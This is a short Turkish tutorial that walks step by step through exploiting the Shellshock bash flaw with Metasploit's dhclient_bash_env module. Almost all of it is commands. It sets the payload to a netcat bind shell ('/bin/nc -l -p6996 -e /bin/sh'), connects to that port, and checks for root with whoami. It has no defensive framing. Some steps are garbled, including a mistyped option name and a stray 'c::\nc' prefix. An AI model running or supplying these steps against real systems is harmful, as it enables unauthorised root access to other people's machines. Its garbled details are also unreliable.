Shellshock Nedir?

Linux sistemlerde bash kabuğunda fark edilen güvenlik açığıdır.

Nasıl Kullanılır?

• Metasploit Framework ü çalıştıyoruz;

msfconsole

• Exploit i arıyoruz;

search shellshock

• Exploit i yüklüyoruz.

use auxiliary/server/dhclient/dhclient_bash_env

• Exploit için gerekli paremetlereler “CMD” , “SRVHOST” VE “NETMASK”. Bunları eğer görüntülemek istersek;

info

• Seçenekleri görüntüleyip parametreleri düzenleme aşamasına geçersek;

show options

• DHPC sunucu ip adresini değişmek için;

set SVRHOST 192.168.131.61

• CMD parametresini düzenlemek için;

set CMD /bin/nc -l -p6996 -e /bin/sh

• Son parametremiz NETMASK için;

set NETMASK 255.255.255.0

• Exploiti çalıştrmak için;

exploit

• Çalıştırdıktan sonra durumu özet geçmek gerekirse hedefin CMD satırında Shellshock zafiyeti sayesinde root yetkisiyle “6996” nolu portla netcat yardımıyla bağlantı kurabiliriz. Exploitli sisteme bağlanmak için;

c::\nc 192.168.131.61 6996

• Exploited Linux sistemin ayarlarına döndürmek için;

ifconfig

yapmamız yeterlidir.

• Sistemdeki yetkimizi check etmek için;

whoami

yapıp root olup olmadığımızı doğrulayabiliriz.

TR | Metasploit Framework Yardımı ile Shellshock Zafiyetinden Yararlanma Mustafa Kaan Demirhan